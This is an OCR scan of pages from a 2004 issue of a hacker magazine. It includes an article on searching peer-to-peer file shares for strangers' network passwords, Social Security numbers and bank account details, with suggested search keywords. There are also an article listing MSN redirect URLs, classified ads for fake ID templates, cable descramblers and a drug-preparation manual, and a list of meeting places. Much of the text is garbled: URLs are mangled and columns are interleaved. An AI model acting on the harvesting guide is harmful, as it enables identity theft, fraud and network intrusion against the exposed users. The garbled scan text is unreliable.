guard, Netgear, and Linksys.
In no way am I discounting the value of
broadband phone service providers. However, it
is my opinion that these same providers should
be a little more security conscious.
by Kong
#include
Even if you will not admit it, more than
likely you have downloaded some sort of music
or software via a peer to peer network like mil-
lions of other people around the world. Whether
it was in the glory days of Morpheus and Nap-
ster or in the RIAA infested world of Kazaa to-
day, it makes no difference. While you can find
almost any sort of media you desire, there are
more interesting things that can be found. First,
let's examine what happens when you install
most online sharing programs. The setup pro-
gram will ask you what files and folders you
want to share. Since naive and novice computer
users know that sharing is the basis of all peer to
' peer networks, they decide to share everything
in their "My Documents" folder or sometimes
even everything on their computer without
knowing that there is anything wrong with this.
Now it gets interesting if you know what to look
for.
Several times I have found network configu-
ration documents that people left laying around
on their computer. Many of these documents are
for different businesses and schools that have
hired people to install networks for them. These
documents often contain idiot-proof instruc-
tions on how to connect to the network (not like
that is a complicated process). Besides the in-
structions which you can toss aside, such docu-
ments can also contain every computer's
hostname, IP address, usernames, passwords,
and various other proprietary information meant
for employees only. All it takes is one careless
employee to leave the document on an unse-
cured computer and the whole world has access
to it. Some good keywords to search for are net-
work, setup, configuration, install, and LAN.
Despite it being scary how easily someone
can obtain such detailed information about a
network, the following is even scarier. The pop-
ular craze today is doing taxes online. At most
places you enter all your information and within
a few days or even hours they send you your tax
information in PDF form. The two forms sent
are the 1040 and 8283. The 8283 is basically a
worksheet that isn't needed but contains your
address, social security number, work, work
phone number, and money earned that year. All
this can be used for pretty much any purpose
you desire. The 1040 contains even more vital
information. It has the same information as the
8283 plus some. This is the form you have to
send in to the IRS. If you are receiving a refund,
more then likely you are getting a direct deposit
to speed things up. In order to receive this, the
form will require you to fill out your bank's
routing number and account number. Several
sites have a search engine that allows you to en-
ter a routing number and tells you the bank's
name. After obtaining any of those documents,
you have a good deal of information about a
person. Just search for items such as return, tax.
1040, 8283, federal, or anything of that nature.
It might take awhile to download something
interesting and most files will not be what you
are looking for but eventually you will find
something worthwhile. Just remember not to be
too vicious with anything you discover.
TIE FIFT1 HOPE
3 Days of Hacker Pun / / f
at the HOtel PEnnsylvania P [El
in New York City\ I
Friday, July 9th E I
through Sunday, July 11th ^ — ,/
Keynote Speaker: Kevin Mitnick
Plus Three Tracks of Speakers, Movies, Games
Admission for the Entire Conference is $50
Register at www.liope.net
or Write to: The Fifth Hope
c/o 2600 P.O. Box 752
Middle Island, NY 11953 USA
■Shoo flagazine
ntSH^ Redirect Scan
by StankDawg@hotmail.com
If you visit msn.com (which you might do as the default home page in a lot of circumstances)
you may notice that the page can be customized based on your settings. For example, a Dell system
sometimes defaults to the homepage http://dellnet.msn.com/ which uses a custom module in the
msn system to deliver Dell information. I found this both annoying and interesting.
After a little reverse engineering, I discovered that you can either go to these sites directly or you
can be redirected to these sites from http://go.msn.com/ by using the proper URL parameters. It
turns out that it redirects to a specific page customized to a specific company or group based on the
parameters passed via the URL. For example, not only can you type in the direct dellnet address
listed above, but you can also use the redirected http://go.msn.com/ address listed below to get to
the same place. I decided to hammer through some patterns and see what other sites offer custom
services. The results are listed below.
URL Company /Site
h t tp ; //go . msn . com/ 0 / 0 / 1 . asp
hr. tp: //go . msn . com/ 0/0/3 . asp
.'it: tp ://go . msn . com/ 0/1/0 . asp
http://go.msn.eom/0/l/l.a8p
ht tp : //go . man . cam/ 0/1/2 . asp
ht tp: //go . msn . com/0/3/1 . asp
h t tp : //go . msn . com/ 0/3 /2.asp
ht tp : //go . msn . com/0/3/3 . asp
hr tp //go . msn . com/0/3/4 . asp
h c tp : //go . msn . com/ 0/3/ 5 . asp
he ep : //go . msn . com/ 0/3/6 . asp
he tp : //go . msn . com/ 0/3/ 7. asp
ht tp : //go . msn . com/ 0/3/6 . asp
ht tp : //go . msn . com/ 0/3/ 9 . asp
http: //go . msn . com/0/3/1 O.asp
ht tp : //go . man . com/0/3/11 . asp
h t tp : //go . msn . com/0/3/12 . asp
http://go.msn.eom/0/3/13.asp
ht tp: //go . msn . com/ 0/3/14 . asp
http: //go . man . com/ 0/3/1 5 . asp
http: //go . msn . com/0/3/16 . asp
ht tp : //go . msn . corn/ 0/3/1 7. asp
http : //go . msn . com/ 0/3/1 8 . asp
http: //go . msn . com/0/3/19 . asp
ht t p: //go . msn . com/0/3/20 . asp
h t tp : //go . msn . com/ 0/5/1 . asp
http://go.msn.eom/0/6/l . asp
http://go.msn.eom/0/7/l . asp
h t tp : //go . msn . com/0/8 /l . asp
Microsoft - IB5.5 SP1 download (redirects to an apology page)
Dell - * ebar " (error page, apparently this no longer exists )
MSN - MSN Member
MSN - Canadian version
MSN - My MSN (customised page)
Best Buy
Charter Communications - Broadband ISP Home page
Dell
Disney
Beat Buy
Charter Communications - Broadband ISP Home page
Dell
Disney
Staples
Veri son
QWEST
Staples
United Airlines
Verisan
Verizon - Direct link to MSN Groups
Verizon - Direct link to MSN Shopping
Verizon - Direct link to MSN Money Central
Verizon - Direct link to My MSN (customized page)
This was done manually during a training session where I sat in the back of the class unchal-
lenged and bored to tears. I only went through some limited ranges in my testing. It could easily be
scripted to check for a larger series of numbers. A couple of them seemed interesting, such as the
"ebar" page. Maybe there are some other software download pages that could be interesting. Maybe
there are ways to login or access customized systems that weren't intended for public consumption.
Just think of how many other sites may be out there on the web that could work the same way. See
what others you can find!
^ Spring BOOH P • g • 55
Happenings
THE FIFTH HOPE will take place ol New York City * Hotel Pennsylvania
from July 9th to the 1 1 th This will be a very special conference, marking the
20th anniversary of 2600 and the l Oth ranivenary of the First HOPE. There'*
still time to get involved and become a speaker nr help to organize this his-
toric event If you want to be pan of this, go to wwwhopc net and follow the
links fur speakers and/or volunteers. See you there'
For Sale
HOW TO BE ANONYMOUS ON THE INTERNET. Easy to follow lessons
on achieving Internet anonymity, privacy, and security. The book's 20 chap-
ters cover I ) simple proxy use for WWW; 2) how to send and receive e-mail
anonymously: .1) use SOCKS proxies for IRC. ICQ. NNTP. SMTP. HTTP. 4)
web based proxies - JAP. Multiproxy. Crowdr. 5) do-it-yourself proxies -
AnalogX. Wingates; 6) read and post in newsgroups I Usenet) in complete pri-
vacy; 7) for pay proxies. Learn how to hunt for. find, and utilize all types of
proxies, clean up your browsers, clean up your whole Windows OS. This pro-
fessionally written but non- technical jargon filled book is geared towards the
beginner to advanced readers and the avenge Internet user The book lesson*
are on a CD in easy to read HTML interface format with numerous illustra-
tions throughout. .Send $20 (HI pay S/H) to Plamcn Petknv. 1 390 E Vegas
Valley Dr. #40. Las Vegas. NV 89109. Money orders, personal checks, cash
accepted.
THE IBM -PC UNDERGROUND ON DVD. Topping off « a full 4.2 giga-
bytes. ACiD preients the first DVD-ROM compilation for the IBM-PC under-
ground scene entitled 'Dark Domain.* Inside is an expansive trove of files
dating ax far back a* 1987 up to the dose of 2003; from unpacks to loaders
and cracktros to magazines, plus all the necessary programs for browsing
them. If you ever wanted to see a lost JED ANSimation display at 2400 boud.
here's your chance For order details and more information please consult
http ://ww w. darlukirniun org/
AFFORDABLE AND RELIABLE LINUX HOSTING. KaJcton Internet
provides affordable web hosting hosed aa Linux servers Our hosting plans
start from only $4.95 per month. This includes support for Python. Perl. PHP.
MySQL and more Privacy is guaranteed and you can pay by E-Gold, pay pal.
or credit card http://wwwJudeton.com
DRIVER'S LICENSE BAR-BOOK and "fake* ID templates Includes pho-
tos. templates, and information on all security features of every single Ameri-
can and Canadian driven' licenses. Including information on making Take"
ID's oa PVC cards, laminating, making holograms, magnetic stripes, soft-
ware. and more to moke your very own license 1 Send $25 cash in US funds or
an international money order in US funds made out to R J Oit and mailed to
Driver's Bar Book, PO Box 2306. Station Main, Winnipeg. Manitoba. R3C
4A6. Canada. Order now and get FREE laminates with every order! Wc ship
worldwide free!
ONLINE RETAILER OF COMPUTER PRODUCTS is also a 2600 sub-
scriber! 60.000 different computer products from components to complete
systems, laptops. PDAs, cables, RAM. ami media all available online at
http //www digitalrverything.ca Worldwide shipping is no problem. Just
mention you are a subscriber and I’ll give you better prices too. Contact Dave
ol salesCtf digitaJevcry thing ca for more info.
HACKER LOGO T-SHIRTS AND STICKERS. Show your affiliation with
the hacker community. Get t-shirts and stickers emblazoned with the Hacker
Logo at HockerLogo com. Our Hacker Logo I -shirt* are high quality Hanes
Bccfy-Ts that will visibly associate you as a member of the tucker culture
Our stickers are black print on sturdy white vinyl, and work well on note-
books. laptops, bumpers, lackers, etc.
PHONE HOME. Tiny, sub-miniature. 7/10 ounce, progranunablc/rcpro-
grainrtuthlc touch-tone, multi-frequency (DTMF) dialer which can store up to
15 touch-tone digits. Unit ts held against the telephone receiver's microphone
for dialing Press "HOME" to automatically dial the stored digits which can
then be heard through the ultra miniature speaker Ideal for ET.'s, children.
Alzheimer victims, lost dags/chimps, significant others, hackers, and com-
puter wizards. Give one to a boy/girl friend or to that potential "someone"
you meet at a party, the supermarket, school, or the mall; with your pre-pro-
grammed telephone number, he/she will always be able to call you! Also,
ideal if you don't want to "disclose* your telephone number but want some-
one to be oblc to call you locally or long distance by telephone Key rmg/clip.
Limited quantity available. Money order only. $16.95 ♦ $1-55 S/H. Mail or-
lormalion package by visiting www.paranoidpublicatinns.corn and clicking
on "Authors." We do not accept or respond to e-mails, faxes, or telephone
calls from prospective authors. No matter how good it sounds on die phone,
we have to see it in print. While you're there, check out our newest book - Thr I
Preparatory Manual of Narrotics. Author Jared B. Ixdgatd shows us how to
prepare and handle numerous hazardous controlled substances of an intoxi-
cating nature Written in plain English, this manual is simple enough for the
common man to comprehend yet advanced enough to hold the attention of
even the most accomplished chemist All of our titles are perfect bound and
printed on acid -free, high quality paper that is 259b recycled. 10% of which i* I
post consumer content. Enter coupon code ">pnng2600" (without the quotes) I
for 10% off your order Visa. MasterCard. American Express. Discover. JCB,
and old fashioned checks and money orders are welcomed. Due to much
fraud, we no longer accept eCheckv No orders by telephone, please. Cus-
tomer service and product information 800-AHI-8995 or 219-326-6662
SIZE DOES MATTER! The Twin Towers may be gone forever but a de-
tailed image still exists of the massive 374-foot radio tower that was perched I
atop Ooe World Trade Center This high-quality glossy color poster is avail-
able in two sizes ( 16" x 20“ and 20" x 30“ j and makrs a spectacular gift for i
engineers, scientists, radio and television buffs, or anybody who appreciates a j
unique, rarely seen view of the World Trade Centex, Visit www.wtc poster. us
for samples and to order your own poster.
WIRELESS SECURITY PERSPECTIVES. Moodily, commercial-grade
information on wireless security. Learn how to protect your cellular. PC'S. 3G.
Bluetooth, or WiFi system from 2600 readers. Subscriptions start at $350 per
year. Check as out at http.//cnp-wirelcss.com/wr>ip.html.
CABLE TV DESCRAMBLERS. New (2) Each $74 ♦ $5.00 shipping,
money ordcr/cash only Works on analog or analog/dignal cable systems Pre-
mium channels and povubly PPV depending on system. Complete with
I lOvac power supply Purchaser assumes sole responsibility for notifying ca-
ble operator of use of descrambler Require* a cable TV converter (i.c.. Radio
Shock ) to he used with the unit. Cable connects to the convener, then the de-
scrambler, then the output goes to TV set tuned to channel 3. CD 962 1 Olive,
Box 28992-TS. Olivette! Sur. Missouri 63132. Email cablcdescramblcr
•guy yahoo com
LEARN LOCK PICKING It's EASY with our book Our 2nd edition odds
lots more interesting material and illustrations Learn what they don’t want
you to know Any security system can be beaten, many times right through
the front door Be secure learn the secret* and weakness of today's locks. If
you want to get where you are not supposed to be. this book could be your
answer Explore the empowering world of lock picking Semi twenty bucks to
Standard Publications. PO Box 2226HQ, Champaign, IL 61825 or visit us at !
ww w_siandardpublKations.com/duect/2600 html for your 2600 reader price
discount
CAP'S CRUNCH WHISTLES. Brand new. only a few left THE ORIGI
NAL WHISTLE in mint condition, never used Join the elite few who own
this treasure! Once they ore gone, that is it • there ore no more' Keychain hole I
fur keyring. Identify yourself at meetings, etc as a 2600 member by dangling I
your keychain and saying nothing Cover ooe hole and get exactly 2600 hz.
cover the other hole and get another frequency, line both holes to cull your
dog or dolphin. Also, ideal for telephone remote control devices. Price in-
cludes moiling $49.95 Not ooly a collector's item but a VERY USEFUL de-
vice to carry at all iimev Cash or money order only. Moil to: WHISTLE. P.O.
Box I I562 ST, Clt. Missouri 63105.
REAL WORLD HACKING: Interested in rooftops, steam tunnels, and the
like? For a copy of Infiltration, the zinc about going places you're not sup-
posed to go. send $3 cash to PO Box 13. Station E. Toronto. ON M6H 4EI . 1
Canada.
TAP/YIPI. The original phreaking and hacking zincs’ All original bock is-
sues on CD-ROM. Only $5 including postage! Write for a free catalog of the
best underground CD-ROMS' Whirlwind, Box 8619. Victoria BC. V8W 3S2. I
Canada.
AT LAST AN ACCURATE DESCRIPTION OF THE BELIEFS AND
BEHAVIOR OF HACKERS! Social Inquiry offer* a research report pro-
duced by Bernhardt Licberman. emeritus professor from the University of
Pittsburgh and Director of Social Inquiry, his own social research firm. Pro-
fessor Licberman held appointments in the Departments of Sociology and
Psychology at the University of Pittsburgh. He conducted a detailed interview I
of hackers in Pittsburgh and administered five questionnaires to them a
hacker motivation questionnaire. ■ hacker ethic questionnaire, an altitude to-
ward the law scale, a liberalism-conservatism scale, and a personality ques-
tionnaire designed to deal with the myth of the hacker as a social misfit.
der to: PR. 331 N. New Balias Road. Box 410802, CRC. Missouri 63141
SEEKING MANUSCRIPTS FOR PUBLICATION. The Paranoid Publica-
tions Group is currently accepting unsolicited, unpublished manuscripts for
consideration. For complete information, download our electronic author's tn-
Prnfessor Licberman attended H2K2, observed the behavior of hackers in
convention, and administered the five questionnaires to hackers attending
H2K2. 7116 report also contains a content analysis of 2600. The report pre-
sents a description of the beUfeft and behavior of hackers produced by these
J
Page 51.
PbOO Hagazine
/ method* of inquiry. The report U neither a condemnation nor ■ whitewash of
hackers. nor docs it justify the actions of criminal justice systems and the dis-
ciplinary actions of school administrators. It is designed to offer a more accu-
rate picture of hackers than the pictures presented by the mas* media and the
v nminal justice systems The report recommends that the desire of hackers to
learn about computers, computing, and technology should be channeled into
^instructive ends, as much as that is possible. The report is 140 pages long
and contains 55.000 wards. Professor Lieberman received no grant or con-
tract money to do this wort; he did the wort using his own money and was.
and is. beholden to no one. To get a copy of the report send a check or money
order for S23.50 + $4 JO <56.00 ouuide North America) for shipping (in U.S.
dollars) payable to Social Inquiry, 627 Beverly Road. Pittsburgh. PA 15243.
rhuse fortunate enough to have institutional funds to pay for the report are in-
vited to send a purchase order. (Federal tax ID number 25-1377234.) Profes-
sor Lieberman can be reached at 412.343.2508. His website is
www. tclcrmna.com/-blieber
Help Wanted
GOOD COMMUNICATORS NEEDED to promote revolutionary sender
pays spam elimination infrastructure E-mail davtdnicol@pay2send.com with
'2600 marketplace" in your message Lifetime residual earnings potential,
t REDIT REPORT HELP NEEDED. Need some assistance removing neg-
ative item* off credit reports Will pay All agencies. Please respond to
nkysightti spaceman com.
HIRING PROFESSIONAL INTERNET CONSULTANTS with job refer-
ence* only for the following; website security, performance tuning, and mar-
keting for online magazine. Please send your bio and resume to:
lbhumworth@yahoo.com -you can wort from home, but should live in (or
around) NYC. as you will need to attend a meeting or two.
Wanted
HAVE KNOWLEDGE OF SECURITY BREACHES at your bank > Heard
tumors of cracked customer databases? Know there ore unaddressed vulnera-
bilities in a retailer's credit card network, but its management doesn't know or
care? We want your tips. Wc arc a business newsletter focusing on security
issues in the financial industry IT security, privacy, regulatory compliance,
identity -theft and fraud, money-laundering. Wherever criminal activity meets
honks, wc ore there You can remain anonymous. (Note: wc will not print ru-
mors circulated by one person or group without obtaining supporting evi-
dence or corroboration from other parties.) Contact
b.inksecuritynews@yahoo.com or call 212-564-8972. ext. 102.
BUYING BOOKS AND MORE. Man interested in books related to hock
ing. security, phrraking. programming, and more. Willing to purchase reason-
able books/off eiv I do search Google! No rip-offs please. Contact me ol
lltda@atl.net.
FREE SOFTWARE DISTRIBUTION. I have a website (www.cloder.com.
come check it out!) that has a fair amount of traffic Mostly fur debiun and
redhat cds. I am looking for hackers who have made their own interesting
programs and wish to shore. If you have some redly interesting appy I can
give you (for free!) a page or a sub domain. I am looking to assist the open
source movement and the hacker community. You can email me at
clixler@hotmail.com. Please place "download" in the subject heading. All in-
teresting ideas welcome. Eric Loder.
NEED DIAL IT HACKING INFO (steps involved, current dial ups. etc.)
Also looking for places on the Internet where I can get unlisted phone num-
bers for free Please contact me at btllm2@prodig> net
IF YOU DON’T WANT SOMETHING TO BE TRUE, does that make it
propaganda? When we’re children and wc don't want to listen, we put our
tiunds over our ears. As we grow up. we create new ways to ignore things we
don't warn u» hear. We make excuses. We look the ocher way. We label things
propaganda" or ‘scare tactics." But it doesn't work. It doesn't make the truth
go away. Government and corporate MIND CONTROL PROGRAMS are
used to intimidate, torture, and murder people globally. It may not be what
you wunt to hear But thoi doesn’t make it any less true. Please visit and sup-
port John Gregory 1-ambro* by distributing this ad to free classified advertis-
ing site* and newsgroups globally, www.brazilboycon.org THANK YOU!
Services
INTELLIGENT HACKERS UNIX SHELL. Reverse.Net to owned and op- >
crated by intelligent hackrn. We believe every user has the right to online se-
curity and privacy. In today's hostile anti-hacker atmosphere, intelligent
hackers require the need far a secure place to work, without big- brother look-
ing over their shoulder. We provide highly filtered DoS protection. Our mam
server is a P3 1 .2 ghz machine. 1 .5 gigs of ram. 5 1 2 megs of swap. 40 gig
HIDE, with complete online "privacy.” Compile your favorite security tools,
use sxh. stunnel. nmap. etc. Affordable pricing from S I (Vmonth. with a 14 day
money back guarantee http. //www.reverse .net/
Announcements
OFF THE HOOK is the weekly one hour hacker radio show presented
Wednesday nights at 7:00 pm ET on WBAl 99.5 FM in New York City. You
can also tune in over the net at www.2600.com/offthehouk or on shortwave in
North and South America at 7415 khz. Archives of all shows dating back to
1988 can be found at the 2600 site, now m mp3 format! Shows from 1988-
2003 ate now available on DVD! Details on page 9 Your feedback on the
program is always welcome at oth@2600.com.
IIACKER.SHOMEPAGK.COM. Your source for keyboard loggers, gam-
bling devices, magnetic stripe reader/writers, vending machine de (caters,
satellite TV equipment, lockpicks. etc... (407) 650-2830.
CHRISTIAN HACKERS' ASSOCIATION: Check out the webpage
http://www.chnMianhackcr.org for details. Wc exist to promote a community
for Christian hackers to discuss and impact the realm where faith and technol-
ogy intersect for the purpose of feeing fives changed by God's grace through
faith in Jens.
VMYTHS.COM AUDIO RANTS ore available free of charge to computer
talk shows. These short and often hilarious MP3* dispel the hysteria that sur-
rounds computer security. One former White House computer security advi-
sor hate* these rants (and wc don't make this claim lightly). Check out
Vmythft.com/news.cfrn for details.
HACKERM1ND: Dedicated to bringing you the opinions of those in the
hacker world, and home of the ezine Frequency Visit www hackermind net
for details.
DO YOU WANT ANOTHER PRINTED MAGAZINE that complements
2600 with even more hacking information? Binary Revolution is a magazine
from the Digital Dawg Pound about hacking und technology. Specifically, wc
look at underground topics of technology including. Hacking. Phreaking. Se-
curity. Urban Exploration. Digital Rights, and more For more information, or
to order your printed copy online, visit us at http://www.binrev.cafn/ where
you will also find instructions on mail orders. Welcome to the revolution!
Personals
VINTAGE COMPUTER RESOURCES FOR RESEARCH. VintageTech
provides a wide variety of computer historical related services for business
und academia We provide: support services for legal firms for computer and
software patent litigation and prior art research: props and consulting for
movie or film production and photography studios requiring period authentic
computer* and computer related items; data recovery and conversion from old
and obsolete data media to modem media; appraisals of vintage computer
items far sale, charitable donation, or insurance valuations: sales brokering of
vintage computers and related items; general computer history consulting and
research. VintageTech maintains an extensive archive of computer*, software,
documentation, and an expansive library of computer related books and mag-
azines. Visit a* online at http://www.vmtagctcch.com or call +1 925 294 5900
to learn more about the services we provide
PAY2SEND.COM is an c-nuuJ forwarding service that only forwards mes-
sages from whiteliMcd contacts or people who pay you to receive from them,
using a patent-pending identity technique. Sign up via our web page form.
I AM A 22 YEAR OLD KNOW! .EDGE SEEKER that has been incarcer-
ated for the past 2 yean and have 2 yean to go until my release I am looking
for anyone who has the tune to leach or print tutorial* for me to learn from. I
am Interested in any field such as phreaking. cracking, programming
OpenBSb. or anything else to keep my mind on the right track while I do my
segregation time. I also would enjoy some penpal* if anyone has time. I will
answer ALL letters promptly. If interested please write me at: Joshua Stccl-
smith #1 13667. WVCF-IDOC. PO Box 1 1 1 1. Carlisle. IN 47838.
STORMBRINGER'S 411: My Habeas Corpus (2255) was just denied so I’m
in for the 262 month long haul. Am trying to get back in contact with the D.C.
crew. Roadie, Jcc630. Alby. Protozoa. Ophic. Professor, Dr. Freeze. Mudge.
Vox Buster. Panzer, and whoever else wonts to write. PT Barnurn. I lost your
411. Wireless, ham. data over radio is my bag. Write: William K. Smith.
44684-083. FCI Cumberland Unit A-l. PO Box 1000, Cumberland, MD
21501 (web- www.stonnbringef.tv)
PRISON REALLY SUCKS! Known os Alpha bits fur many yean Help me
pass die time in here and write to me. Only 2 more years left and I am going
crazy without any mental stimulation I welcome letter* from anyone and will
reply to all. Jeremy Cushing #J51 130. Centtnela Stale Prison. PO. Box 911.
Imperial. CA 9225 1 -0911
RESOURCE MAN i* looking for more addresses (snail mail) Please send
any addresses of the following book dubs, subscription services, newspa-
pers. computer/hacking magazines, and any foreign addresses which are a
special delight The further away the better Also. I am a munga/anime fanatic
(dbz. Dtgtnwm. Outlaw Star. Chobits, Tent hi Muyo. etc.). Please send any re-
lated information to: Dumyel Sigsworth *1062882. PO Box 2000. Colorado
City. TX 79512. Will respond if desired
ONLY SUBSCRIBERS CAN ADVERTISE IN 2600 ’ Don’t even think
about trying to take out an ad unless you subscribe! All ads arc free and there
is no amount of money wc will accept for a non subscriber ad. We hope that's
dear Of course, we reserve the right to po*« judgment on your ad and not
print it if it’s amazingly stupid or has nothing at all to do with the hacker
world. Wc make no guarantee ax to the honesty, righteousness, sanity, etc. of
the people advertising here. Contact them at your peril All submission* arc
far ONE ISSUE ONLY* If yuu wont to run your ad more than once you must
resubmit it each time. Don’t expect us to run more than one ad for you in a
single issue cither. Include your address label or a photocopy so we know
you’re a subscriber. Send your ad to 2600 Marketplace. PO Box 99. Middle
Island. NY 11953. Deadline for Summer isaue WliM
m WW A
AjgBemy Cinefltr On Pultemy St. B pnfT
f&bane: Hungry Jacks or th* Queen
' SI. Mall (RHS. opposite Info Booth).
7 pm.
Canberra: Kt's Virtual Reality Cafe. 11
East RW. Civic. 7 pm.
Melbourne: Melbourne Central Shop-
ping Centre at the Swanston Street
entrance near the public phones.
Perth: The Merchant Tea and Coffee
House. 183 Murray St. 6 pm.
Sydney: The Crystal Palace, front
bar/bistro. opposite the bus station
area on George Street at Central
Station. 6 pm.
AUSTRIA
Graz: Cafe Hattestelle on Jakomini-
platt.
BRAZIL
Belo Horizonte: Pelego's Bar at
Assufeng, near the payphone. 6 pm.
CANADA
Alberta
Calgary: Eau Claire Market food court
by the bland yellow wall (formerly the
•milk wall*).
British Columbia
Nanaimo: Tim Horton's at Comox &
Wallace.
Vancouver: Pacific Centre Food Fair,
one level down from street level by
payphones. 4 pm to 9 pm.
Victoria: Eaton Center food court by
AAW.
Manitoba
Winnipeg: Garden City Shopping Cen-
ter. Center Food Court adjacent to the
A A W restaurant.
New Brunswick
Moncton: Ground Zero Networks
Internet Cafe, 720 Main St. 7 pm.
Ontario
Barrie: William's Coffee Pub, 505
Bryne Drive. 7 pm.
Guelph: William's Coffee Pub. 429
Edinbourgh Road. 7 pm.
Hamilton: McMaster University
Student Center, Room 318. 7:30 pm.
Ottawa: Agora Bookstore and Internet
Cafe. 145 Besserer Street 6:30 pm.
Toronto: Food Bar. 199 College Street
Quebec
Montreal; Bell Amphitheatre. 1000
Gauchetiere Street
CZECH REPUBLIC
Prague: Legenda pub. 6 pm.
OENMARK
Aarhus: In the far comer of the 0SB
cafe in the railway station.
Copenhagen: Ved Cafe Blasen.
Sonderborg: Cafe Druen. 7:30 pm.
EGYPT
Port Said: At the foot of the Obelisk
(El MissaUah).
ENGLAND
Exeter: At the payphones, Bedford
Square. 7 pm.
Hampshire: Outside the Guildhall.
Portsmouth.
Hull: The Old Gray Mare Pub, opposite
Hull University. 7 pm.
London: Trocadero Shopping Center
(near Picadiity Circus), lowest leveL 7
pm.
Manchester: The Green Room on
Whitworth Street 7 pm.
Norwich: Main foyer of the Norwich
•Forum* Library. 7:30 pm.
Reading: Afro Bar. Merchants Place,
off Friar St 6 pm.
FINLAND
Helsinki: FenniafcortteU food court
(Vuorikatu 14).
FRANCE
Avignon: Bottom of Rue de la Re-
publique in front of the fountain with
the flowers. 7 pm.
Grenoble: Eve, campus of St Martin
d'Heres. Ft Laui
Paris: Place de la Repubiique. near the foodfirf
(empty- feotato'n 6 pm. %B
Florida
ile: BrowaidJtall in the
of thglM^r-
to the mHMfRFR^blic
Athens: Outside the bookstore
Papaswtiriou on the comer of Patision
and Stoumari. 7 pm.
IRELAND
Dublin: At the phone booths on Wick-
Bc. Jpm.
Orlando: Fashfifi SquaraJtrtl food
, Court between '♦loebn Gooemet and
’^Manchu Wok. 6 pm.
Georgia
Atlanta: Lenox Mall food court 7 pm.
Hawaii
Honolulu: Coffee Talk Cafe. 3601 Wa-
low Street beside Tower Records. 7 pm. »*!** *ve. Payphone: (808) 732-9184.
ITALY
Milan: Piazza Loreto in front of
McDonalds.
JAPAN
Tokyo: Linux Cafe in Akihabara
district 6 pm.
NEW ZEALAND
Auckland: London Bar. upstairs.
Wellesley St, Auckland CentraL 5:30
pm.
Christchurch: Java Cafe, comer of
High St and Manchester St 6 pm.
Wellington: Load Cafe in Cuba MalL
6 pm.
NORWAY
6 pm.
Idaho
Boise: BSU Student Union Building,
upstairs from the main entrance.
Payphones: (208) 342-9700, 9701.
Pocatello: College Market 604 South
8 th Street
Illinois
Chicago: Union Station in the Great
Hall near the payphones.
Indiana
Evansville: Barnes and Noble cafe at
624 S Green River Rd.
Ft Wayne: Glenbrook Mall food court
in front of Sbarro's. 6 pm.
Oslo: Oslo Sontrot Tram Sutler,. 7 pm. IndUnspoHs: BonUrs Books oo tire
Tromsoe: The upper floor at Bias Rock ^of »ondun,od WssUnoton.
r.tm x nm South Bend (Mishawaka): Barnes and
6 P m iifthu ..f. An, ba
Trondhofm: kick-, Cjfe in Nordreqote. NoWt aft ' 4601 Ri
6 pm I °«
SCOTLAND Ames: Santa Fe Espresso, 116 Welch
Glasgow: Central Station, payphones Av *‘
next to Platform 1 7 pm. |~ n “*
SLOVAKIA
Bratislava: at Polos City Center in the H,llfood cour V .
c^rt (opposH. side of the escala- ^ Ro(jg#; ° ^ LSU
SOUTH AFRICA 'S'
lnKinnoshism /C„d. n „ rftw ,. rWXt t ° P«yPhOO|
numbors: (225) 387-9520,
Sondlon food '—
Raleigh: Czabtree Valley Mall food
court ii^ront of the McDonald's.
Wilmington: Independence Mall food |
court
Ohio
Akron: Arabic* on W. Market Street,
intersection of Hawkins, W. Market,
and Exchange.
Cleveland: University Circle Arabic*.
11300 Juniper Rd. Upstairs, turn right,
second room on left.
Columbus: Convention Center (down-
town). south (hotel) half, carpeted
payphone area, near restrooms, north 1
of food court 7 pm.
Dayton: At the Marions behind the
Dayton MalL
Oklahoma
Oklahoma City: The Magic Lamp in tht
Lakeside Shopping Center near the cor-
ner of N. May Ave. and NW 73rd St
Tulsa: Woodland Hills Mali food court,
Oregon
Portland: Backspace Cafe. 115 NW 5th
Ave. 6 pm.
Pennsylvania
Allentown: Pan era Bread on Route
145 (Whitehall). 6 pm.
Philadelphia: 30th Street Station,
under Stairwell 7 sign.
Pittsburgh: William Pitt Union build-
ing on the University of Pittsburgh
campus by the Bigelow Boulevard
entrance.
South Carolina
Charleston: Northwoods MaU in the
haU between Sears and Chik-Rl-A.
South Dakota
Sioux Fells: Empire MaU. by Burger
King.
Tennessee
Knoxville: Borders Books Cafe across
from Westown MaU.
Memphis: Cafe inside Bookstar - 3402
Poplar Ave. at Highland. 6 pm.
Nashville: J -J’s Market. 1912
Broadway.
Texas
Austin: Dobie MaU food court
Oallas: Mama's Pizza, Campbell & Pre-
ston. 7 pm.
Sen Antonio: North Star MaU food
court
Utah
Salt Uke City: ZCMI MaU in The Park
Food Court
Vermont
Buriington: Borders Books at Church St.
and Cherry St on the second floor of
the cafe.
Virginia
Arlington: (see District of Columbia)
Virginia Beach: Lynnhaven Mall on
Lynnhaven Parkway. 6 pm.
Washington
Seattle: Washington State Convention
Center. 6 pm.
Wisconsin
Madison: Union South (227 N. Randall
Ave.) on the lower level In the Copper
Hearth Lounge.
Milwaukee: The Node. 1504 E. North
AU meetings take place on the first Fri-
day of the month, Unless otherwise
noted, they start at 5 pm local time.
To start a meeting in your dty, leave a
message & phone number at
(631) 751-2600 or send email to
meetings@2600.com.
a 00 Hagazine
Come and visit our website and see our vast array of payphone
photos that we've compiled! http://vvw w.2600.com
And yet. people in Sao Paulo don’t seem to he in
the least bit concerned with this new life form.
If phones like this started to sprout in American
streets, there would he massive panic. They look
like some kind of alien.
If you're really daring, this is w hat one of these
monsters looks like as you approach. This one
was seen in Campinas.
And yes. the phone itself, which doesn't seem to
really match its spaey surroundings.
Photos bx Anonymous
Look on the other side of this page for even more photos!
From the Northwest comer of Tiananmen Square
in Beijing (People's Republic ).
And here we have the Southwest corner.
Photos by Tim Fraser
).
A much easier way to find web bugs is us-
ing an Internet Explorer add-on called "Bug-
nosis", which can be downloaded from
www.bugnosis.org, where you can also find
more detailed documentation on web bugs.
The Bugnosis add-on locates the web bugs in
a web page you're viewing and replaces it
with an image you select This way you can
make the web bugs appear, though this won’t
halt their activity. To block web bugs you
must use an advertisement blocker (a few
good ones are recommended at the Bugnosis
site).
Are You an "Off The Hook" Listener?
If you've grown weary of downloading all of the archived shows from 1988 onwards,
then you should continue reading this paragraph! We've taken all of the shows from
1988 to 2003 and stuck them onto a single DVD. That's right, they're all on one disc!
These are the MP3’s that you can still download from our site. For only $30 you can
save yourself the time and storage needed to have all of these shows (and show
summaries) at your fingertips. (These DVD's are readable in all but the oldest of DVD
computer drives and they will also work on most standalone DVD players!)
To order, visit our online store at http://store.2600.com or send $30 to:
